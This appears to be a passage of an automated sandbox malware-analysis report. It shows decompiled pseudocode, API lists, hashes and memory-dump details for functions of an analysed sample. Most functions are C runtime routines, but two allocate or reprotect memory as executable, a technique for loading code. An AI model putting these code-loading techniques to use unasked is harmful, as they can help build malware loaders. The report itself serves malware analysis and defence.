String ID:
API String ID: 269201875-0
Opcode ID: 5fe2170902e34f347e0c7705c383be6b20f5d70d556c1a25ff4744f002635704
Instruction ID: f88c1332c7e73ce0d0d60eeed5af58c0b7ae4e8b9c8efdde93a2aa40c513c0aa
Opcode Fuzzy Hash: 5fe2170902e34f347e0c7705c383be6b20f5d70d556c1a25ff4744f002635704
Instruction Fuzzy Hash: 2D21C232E0C1C16BDB05CE7C5C4DFB57B69CF46B74F254859FA449B640DA22490283F0

Uniqueness

Uniqueness Score: -1.00%

Function 030324D7, Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 03032524

Part of subcall function 03032996: RtlInitializeSListHead.NTDLL(03078F38), ref: 0303299B

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 0303258E
___scrt_fastfail.LIBCMT ref: 030325D8

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 2097537958-0
Opcode ID: 9202ffd4d7297e25fea9c01b7b8063f73500238950ce72408e2b1730fd26ffdb
Instruction ID: e2a8bd5d6bc5546934b0b47141cc0b6eb76a12b206bddb89fe009fe84f4e8474
Opcode Fuzzy Hash: 9202ffd4d7297e25fea9c01b7b8063f73500238950ce72408e2b1730fd26ffdb
Instruction Fuzzy Hash: FD213239A873049ECB20FBB8E4227DD7BAD9FA3225F044C5AC8802F2C2DB714240C665

Uniqueness

Uniqueness Score: -1.00%

Function 6D864667, Relevance: 4.6, APIs: 3, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6D864667(void* __ecx, void* __edx, void* __eflags) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				char _t84;
				signed int _t85;
				void* _t88;
				void* _t89;
				void* _t101;
				void* _t105;
				signed int _t109;
				void* _t112;
				signed int _t114;
				signed int _t118;
				intOrPtr* _t120;
				void* _t122;

				_t104 = __edx;
				_t88 = __ecx;
				E6D864EC0(0x6d8754f0, 0x10);
				_t43 = E6D864408(_t88, __edx, 0); // executed
				_pop(_t89);
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t122 - 0x1d)) = E6D86430D();
					_t84 = 1;
					 *((char*)(_t122 - 0x19)) = 1;
					 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
					_t131 =  *0x6d8c1050;
					if( *0x6d8c1050 != 0) {
						E6D864A9B(_t104, _t105, _t112, 7);
						asm("int3");
						E6D864EC0(0x6d875510, 0x10);
						_t48 =  *0x6d8c1074; // 0x1
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6d8c1074 = _t48 - 1;
							 *(_t122 - 0x1c) = 1;
							 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
							 *((char*)(_t122 - 0x20)) = E6D86430D();
							 *(_t122 - 4) = 1;
							__eflags =  *0x6d8c1050 - 2;
							if( *0x6d8c1050 != 2) {
								E6D864A9B(_t104, 1, _t112, 7);
								asm("int3");
								E6D864EC0(0x6d875538, 0xc);
								_t109 =  *(_t122 + 0xc);
								__eflags = _t109;
								if(_t109 != 0) {
									L23:
									 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										L26:
										_t85 =  *(_t122 + 0x10);
										_t114 = E6D864929( *((intOrPtr*)(_t122 + 8)), _t109, _t85);
										 *(_t122 - 0x1c) = _t114;
										__eflags = _t114;
										if(_t114 != 0) {
											_t55 = E6D864614(_t89, _t104,  *((intOrPtr*)(_t122 + 8)), _t109, _t85); // executed
											_t114 = _t55;
											 *(_t122 - 0x1c) = _t114;
											__eflags = _t114;
											if(_t114 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t109 - 2;
										if(_t109 == 2) {
											goto L26;
										} else {
											_t85 =  *(_t122 + 0x10);
											L28:
											_push(_t85);
											_t56 = E6D861400( *((intOrPtr*)(_t122 + 8)), _t109); // executed
											_t114 = _t56;
											 *(_t122 - 0x1c) = _t114;
											__eflags = _t109 - 1;
											if(_t109 == 1) {
												__eflags = _t114;
												if(_t114 == 0) {
													_push(_t85);
													_t59 = E6D861400( *((intOrPtr*)(_t122 + 8)), _t56);
													__eflags = _t85;
													_t34 = _t85 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t89);
													E6D864929( *((intOrPtr*)(_t122 + 8)), _t114, _t85);
												}
											}
											__eflags = _t109;
											if(_t109 == 0) {
												L33:
												_t114 = E6D864614(_t89, _t104,  *((intOrPtr*)(_t122 + 8)), _t109, _t85);
												 *(_t122 - 0x1c) = _t114;
												__eflags = _t114;
												if(_t114 != 0) {
													_t114 = E6D864929( *((intOrPtr*)(_t122 + 8)), _t109, _t85);
													 *(_t122 - 0x1c) = _t114;
												}
											} else {
												__eflags = _t109 - 3;
												if(_t109 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t122 - 4) = 0xfffffffe;
									_t54 = _t114;
								} else {
									__eflags =  *0x6d8c1074 - _t109; // 0x1
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
								return _t54;
							} else {
								E6D8643D8(_t89);
								E6D864FBC();
								E6D865024();
								 *0x6d8c1050 =  *0x6d8c1050 & 0x00000000;
								 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
								E6D864803();
								_t67 = E6D864579( *((intOrPtr*)(_t122 + 8)), 0);
								asm("sbb esi, esi");
								_t118 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t118;
								 *(_t122 - 0x1c) = _t118;
								 *(_t122 - 4) = 0xfffffffe;
								E6D864810();
								_t69 = _t118;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
							return _t69;
						}
					} else {
						 *0x6d8c1050 = 1;
						if(E6D86436A(_t131) != 0) {
							E6D864FB0(E6D864FF8());
							E6D864FD4();
							_t80 = E6D867A4D(0x6d87017c, 0x6d870190); // executed
							_pop(_t101);
							if(_t80 == 0 && E6D86433F(1, _t101) != 0) {
								E6D867A08(_t101, 0x6d87016c, 0x6d870178);
								 *0x6d8c1050 = 2;
								_t84 = 0;
								 *((char*)(_t122 - 0x19)) = 0;
							}
						}
						 *(_t122 - 4) = 0xfffffffe;
						E6D86474A();
						if(_t84 != 0) {
							goto L11;
						} else {
							_t120 = E6D864FF1();
							_t137 =  *_t120;
							if( *_t120 != 0) {
								_push(_t120);
								if(E6D8644C8(_t137) != 0) {
									 *0x6d870168( *((intOrPtr*)(_t122 + 8)), 2,  *(_t122 + 0xc));
									 *((intOrPtr*)( *_t120))();
								}
							}
							 *0x6d8c1074 =  *0x6d8c1074 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
						return _t44;
					}
				}
			}

0x6d864667
0x6d864667
0x6d86466e
0x6d864675
0x6d86467a
0x6d86467d
0x6d864754
0x6d864754
0x6d864754
0x00000000
0x6d864683
0x6d864688
0x6d86468b
0x6d86468d
0x6d864690
0x6d864694
0x6d86469b
0x6d864768
0x6d86476d
0x6d864775
0x6d86477a
0x6d86477f
0x6d864781
0x6d864788
0x6d864790
0x6d864793
0x6d86479c
0x6d86479f
0x6d8647a2
0x6d8647a9
0x6d864818
0x6d86481d
0x6d864825
0x6d86482a
0x6d86482d
0x6d86482f
0x6d864840
0x6d864840
0x6d864844
0x6d864847
0x6d864853
0x6d864853
0x6d864860
0x6d864862
0x6d864865
0x6d864867
0x6d864872
0x6d864877
0x6d864879
0x6d86487c
0x6d86487e
0x00000000
0x00000000
0x6d86487e
0x6d864849
0x6d864849
0x6d86484c
0x00000000
0x6d86484e
0x6d86484e
0x6d864884
0x6d864884
0x6d864889
0x6d86488e
0x6d864890
0x6d864893
0x6d864896
0x6d864898
0x6d86489a
0x6d86489c
0x6d8648a1
0x6d8648a6
0x6d8648a8
0x6d8648a8
0x6d8648ae
0x6d8648af
0x6d8648b4
0x6d8648ba
0x6d8648ba
0x6d86489a
0x6d8648bf
0x6d8648c1
0x6d8648c8
0x6d8648d2
0x6d8648d4
0x6d8648d7
0x6d8648d9
0x6d8648e5
0x6d86490d
0x6d86490d
0x6d8648c3
0x6d8648c3
0x6d8648c6
0x00000000
0x00000000
0x6d8648c6
0x6d8648c1
0x6d86484c
0x6d864910
0x6d864917
0x6d864831
0x6d864831
0x6d864837
0x00000000
0x6d864839
0x6d864839
0x6d864839
0x6d864837
0x6d86491c
0x6d864928
0x6d8647ab
0x6d8647ab
0x6d8647b0
0x6d8647b5
0x6d8647ba
0x6d8647c1
0x6d8647c5
0x6d8647cf
0x6d8647db
0x6d8647dd
0x6d8647dd
0x6d8647df
0x6d8647e2
0x6d8647e9
0x6d8647ee
0x00000000
0x6d8647ee
0x6d864783
0x6d864783
0x6d8647f0
0x6d8647f3
0x6d8647ff
0x6d8647ff
0x6d8646a1
0x6d8646a1
0x6d8646b2
0x6d8646b9
0x6d8646be
0x6d8646cd
0x6d8646d3
0x6d8646d6
0x6d8646eb
0x6d8646f2
0x6d8646fc
0x6d8646fe
0x6d8646fe
0x6d8646d6
0x6d864701
0x6d864708
0x6d86470f
0x00000000
0x6d864711
0x6d864716
0x6d864718
0x6d86471b
0x6d86471d
0x6d864726
0x6d864734
0x6d86473a
0x6d86473a
0x6d864726
0x6d86473c
0x6d864744
0x6d864744
0x6d864756
0x6d864759
0x6d864765
0x6d864765
0x6d86469b

APIs

__RTC_Initialize.LIBCMT ref: 6D8646B4

Part of subcall function 6D864FB0: InitializeSListHead.KERNEL32(6D8C13B0,6D8646BE,6D8754F0,00000010,6D86464F,?,?,?,6D864877,?,00000001,?,?,00000001,?,6D875538), ref: 6D864FB5

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D86471E
___scrt_fastfail.LIBCMT ref: 6D864768

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 2097537958-0
Opcode ID: aa18295e6fee472b07c36a14768898b7de29258019b71742c5eb31468100e581
Instruction ID: 3d63ec116b9b3f2bc5d1c216e4e43ab4c8b753606732311b4834f96ecdad02e3
Opcode Fuzzy Hash: aa18295e6fee472b07c36a14768898b7de29258019b71742c5eb31468100e581
Instruction Fuzzy Hash: 1621F07254C2CA9ECB11ABBC982CBAC3BB19B9F73DF114C09E6502B5C2CB220104C6B5

Uniqueness

Uniqueness Score: -1.00%

Function 6D861610, Relevance: 4.6, APIs: 3, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D861610(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				struct _MEMORY_BASIC_INFORMATION _v40;
				void* _t24;
				void* _t29;
				void* _t31;
				void* _t47;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t47 = __edi;
				_t24 = E6D8617E0(__ecx, _a8 - 0x10000);
				_t49 = _t48 + 4;
				_v8 = _t24;
				while(_v8 > _a4) {
					_t52 = _v8 -  *0x6d877000; // 0x70000000
					if(_t52 < 0) {
						L5:
						E6D865880(_t47,  &_v40, 0, 0x1c);
						_t49 = _t49 + 0xc;
						if(VirtualQuery(_v8,  &_v40, 0x1c) != 0) {
							if(_v40.State != 0x10000 || _v40.RegionSize < 0x10000) {
								_t29 = E6D8617E0(_v40.AllocationBase - 0x10000, _v40.AllocationBase - 0x10000);
								_t49 = _t49 + 4;
								_v8 = _t29;
								goto L15;
							} else {
								_t31 = VirtualAlloc(_v8, 0x10000, 0x3000, 0x40); // executed
								_v12 = _t31;
								if(_v12 == 0) {
									if(GetLastError() != 0x677) {
										_v8 = _v8 - 0x10000;
										L15:
										continue;
									}
									return 0;
								}
								return _v12;
							}
						}
						break;
					}
					_t53 = _v8 -  *0x6d877004; // 0x80000000
					if(_t53 > 0) {
						goto L5;
					}
					_v8 = _v8 - 0x8000000;
				}
				return 0;
			}

0x6d861610
0x6d86161f
0x6d861624
0x6d861627
0x6d86162a
0x6d861639
0x6d86163f
0x6d86165a
0x6d861662
0x6d861667
0x6d86167b
0x6d861686
0x6d8616dd
0x6d8616e2
0x6d8616e5
0x00000000
0x6d861691
0x6d8616a1
0x6d8616a6
0x6d8616ad
0x6d8616c0
0x6d8616ce
0x6d8616e8
0x00000000
0x6d8616e8
0x00000000
0x6d8616c2
0x00000000
0x6d8616af
0x6d861686
0x00000000
0x6d86167d
0x6d861644
0x6d86164a
0x00000000
0x00000000
0x6d861655
0x6d861655
0x00000000

APIs

VirtualQuery.KERNEL32(00000000,6D861A3E,0000001C,?,?,?,?,6D861A3E,6D86296F,?,?,?,6D861978,6D86296F,?), ref: 6D861674
VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000040,00000000,6D861A3E,0000001C,?,?,?,?,6D861A3E,6D86296F,?), ref: 6D8616A1

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: 0eabe7ac67a822a6f092b1a00ea8b4b4ca4c01cee7f2a3142a0da5b3c2a3e853
Instruction ID: 829406f67d723da94cf996cfaee2fbf3349f3e697bef0d990297d3aa2984acdb
Opcode Fuzzy Hash: 0eabe7ac67a822a6f092b1a00ea8b4b4ca4c01cee7f2a3142a0da5b3c2a3e853
Instruction Fuzzy Hash: C7219074D08188EFCF01DFA8D998B9E77B6EB08364F244954E205A7246D770AB80CB71

Uniqueness

Uniqueness Score: -1.00%

Function 6D86987A, Relevance: 4.6, APIs: 3, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D86987A(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _t7;
				void* _t8;
				void* _t13;
				void* _t24;
				WCHAR* _t26;

				_t26 = GetEnvironmentStringsW();
				if(_t26 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t17 = E6D869843(_t26) - _t26 >> 1;
					_t7 = E6D869796(0, 0, _t26, E6D869843(_t26) - _t26 >> 1, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E6D8683F4(_t7); // executed
						_t24 = _t8;
						if(_t24 == 0 || E6D869796(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t24;
							_t24 = 0;
						}
						E6D867CC2(_t24);
					}
				}
				if(_t26 != 0) {
					FreeEnvironmentStringsW(_t26);
				}
				return _t13;
			}

0x6d869889
0x6d86988f
0x6d8698ea
0x6d8698ea
0x6d869891
0x6d86989f
0x6d8698a5
0x6d8698ad
0x6d8698b2
0x00000000
0x6d8698b4
0x6d8698b5
0x6d8698ba
0x6d8698bf
0x6d8698df
0x6d8698d9
0x6d8698d9
0x6d8698db
0x6d8698db
0x6d8698e2
0x6d8698e7
0x6d8698b2
0x6d8698ee
0x6d8698f1
0x6d8698f1
0x6d8698fd

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6D869883
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D8698F1

Part of subcall function 6D869796: WideCharToMultiByte.KERNEL32(?,00000000,6D86A4BF,00000000,00000001,6D86A44E,6D86C4B3,?,6D86A4BF,?,00000000,?,6D86C222,0000FDE9,00000000,?), ref: 6D869838

Part of subcall function 6D8683F4: RtlAllocateHeap.NTDLL(00000000,6D863211,00000000,?,6D8642B3,6D863211,?,6D863211,00000008,?,?,6D861249,00000000), ref: 6D868426

_free.LIBCMT ref: 6D8698E2

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 605de3bb6dd6e3575745cd056c928dbd4242cc61afb652fe178e27c51d612fd2
Instruction ID: 66b38b02c6692c65b9954bdf02044d2415e46e6e5f359a95db060379d10edc7d
Opcode Fuzzy Hash: 605de3bb6dd6e3575745cd056c928dbd4242cc61afb652fe178e27c51d612fd2
Instruction Fuzzy Hash: 3E01D4A2A056963BA71137AF5C8CC7F297DDEC7EB43110928BA14C6280EF61CD01D2B0

Uniqueness

Uniqueness Score: -1.00%

Function 6D8625A0, Relevance: 4.5, APIs: 3, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D8625A0() {
				void* _v8;
				void* _v12;
				long _v16;
				int _t12;

				_v12 = GetCurrentProcess();
				_t12 =  *0x6d8c1004; // 0x6caf0000
				_v8 = _t12;
				while(_v8 != 0) {
					VirtualProtect(_v8, 0x10000, 0x20,  &_v16); // executed
					_t12 = FlushInstructionCache(_v12, _v8, 0x10000);
					_v8 =  *((intOrPtr*)(_v8 + 4));
				}
				return _t12;
			}

0x6d8625ab
0x6d8625ae
0x6d8625b3
0x6d8625c1
0x6d8625d6
0x6d8625e8
0x6d8625be
0x6d8625be
0x6d8625f2

APIs

GetCurrentProcess.KERNEL32(?,?,6D863144), ref: 6D8625A6
VirtualProtect.KERNEL32(00000000,00010000,00000020,?), ref: 6D8625D6
FlushInstructionCache.KERNEL32(?,00000000,00010000,00000000,00010000,00000020,?), ref: 6D8625E8

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: d40a740bd1169f6fdca215bfdab9d72eb4543623403bce15d9d0788e63c3d473
Instruction ID: 9c7dbbdf914b747e4d60b7c1e5b95dc10df0ce13ba56a16a46750a18edecb8db
Opcode Fuzzy Hash: d40a740bd1169f6fdca215bfdab9d72eb4543623403bce15d9d0788e63c3d473
Instruction Fuzzy Hash: EAF05E74A0424CFBCB11DBE8D959F9DB7B8AB48758F10C899FA00A7240E7719F40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03039087, Relevance: 3.1, APIs: 2, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 030390B5
_free.LIBCMT ref: 030390DB

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: eec28a8bcc6e205f4fd953543f796613b8f898262229c6a1dc313be6403e5873
Instruction ID: fbe04d366ecd7b3d42aaf6b0f0962e7b153a1401f378bddfea3a5332c1a1c7b9
Opcode Fuzzy Hash: eec28a8bcc6e205f4fd953543f796613b8f898262229c6a1dc313be6403e5873
Instruction Fuzzy Hash: 3911B675E437025FE760EA7CAC88BD633DCA782730F580666F522EB1D4D7B8C4924680

Uniqueness

Uniqueness Score: -1.00%

Function 03036F7B, Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0303ABA3: GetEnvironmentStringsW.KERNEL32 ref: 0303ABAC
Part of subcall function 0303ABA3: _free.LIBCMT ref: 0303AC0B
Part of subcall function 0303ABA3: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0303AC1A

_free.LIBCMT ref: 03036FBB
_free.LIBCMT ref: 03036FC2

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: 95176481f87f784d7dc3f8f26a32233b1d63c37993201f1ed9a589cbf5b698ab
Instruction ID: 1438787bfef613a7fc24d45bee8f477318ce2a2a45e18b5fc413ef1cfb644b05
Opcode Fuzzy Hash: 95176481f87f784d7dc3f8f26a32233b1d63c37993201f1ed9a589cbf5b698ab
Instruction Fuzzy Hash: 73E0655AA0B6145DE661FB2DA8806AD168D5FC3230F15025BD8209B1C1DF6584061495

Uniqueness

Uniqueness Score: -1.00%

Function 6D867340, Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D867340(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x6d867345

APIs

Part of subcall function 6D86987A: GetEnvironmentStringsW.KERNEL32 ref: 6D869883
Part of subcall function 6D86987A: _free.LIBCMT ref: 6D8698E2
Part of subcall function 6D86987A: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D8698F1

_free.LIBCMT ref: 6D867380
_free.LIBCMT ref: 6D867387

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: b8d04341498edc183847cb464fd1064e493cffdf5d0363a39f7158458028617b
Instruction ID: 576d395b11d60c8d62bf399644ede16c23ed2755f6fd99374215af7de30c9d5f
Opcode Fuzzy Hash: b8d04341498edc183847cb464fd1064e493cffdf5d0363a39f7158458028617b
Instruction Fuzzy Hash: 8FE0E512E0D99195E321A72E2E4D76D17155B82F78FA34F16EE24CA5C2EF60C40300F6

Uniqueness

Uniqueness Score: -1.00%

Function 6D86B775, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E6D86B775(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E6D868473(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E6D869BF4(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *(_t32 - 0x2b) =  *(_t32 - 0x2b) & 0x000000f8;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E6D867CC2(0);
				return _t35;
			}

0x6d86b77b
0x6d86b782
0x6d86b787
0x6d86b78b
0x6d86b792
0x6d86b798
0x6d86b798
0x6d86b79e
0x6d86b7a0
0x6d86b7a3
0x6d86b7a3
0x6d86b7a6
0x6d86b7a8
0x6d86b7ae
0x6d86b7b2
0x6d86b7b7
0x6d86b7bb
0x6d86b7bd
0x6d86b7c0
0x6d86b7c6
0x6d86b7cd
0x6d86b7d1
0x6d86b7d5
0x6d86b7d8
0x6d86b7db
0x6d86b7db
0x6d86b7df
0x6d86b7e2
0x6d86b794
0x6d86b794
0x6d86b794
0x6d86b7e4
0x6d86b7ef

APIs

Part of subcall function 6D868473: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6D868208,00000001,00000364,00000008,000000FF,?,6D8642B3,6D863211,?,6D863211,00000008), ref: 6D8684B4

_free.LIBCMT ref: 6D86B7E4

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: dc7b64ff50725548e29eca98f690a751dcb1eb3437191a371e491adcf6ad2b5c
Instruction ID: 006e8fa08b296be75659049727bc2476bc4d8f2fbe991753405a11e6c4732620
Opcode Fuzzy Hash: dc7b64ff50725548e29eca98f690a751dcb1eb3437191a371e491adcf6ad2b5c
Instruction Fuzzy Hash: 0901F9B26083966BC3218F5CD888A9DFBE8EB053B4F520A29F559B76C0D7706911C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 030398CB, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0303990C

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: afe39d837db9d899bcc84d2e883624bdcfd6b05e60bfa44d08df6088dc214ce1
Instruction ID: a7b287fbb7049c4678b274e8afa3ed66774626797759897bcc4a42b2fa763105
Opcode Fuzzy Hash: afe39d837db9d899bcc84d2e883624bdcfd6b05e60bfa44d08df6088dc214ce1
Instruction Fuzzy Hash: 64F0E931A4332567DB61EB2B8801B9E778CFF836A0B088053A814DA190DBB4D50086F0

Uniqueness

Uniqueness Score: -1.00%

Function 6D868473, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D868473(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6d8c1810, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6D86AD52();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6D866A5B(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E6D866B7B(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x6d868479
0x6d86847e
0x6d86848c
0x6d86848c
0x6d868492
0x6d868494
0x6d868494
0x6d8684ab
0x6d8684b4
0x6d8684bc
0x00000000
0x00000000
0x6d86849c
0x6d86849e
0x6d8684c0
0x6d8684c5
0x6d8684cb
0x00000000
0x6d8684cb
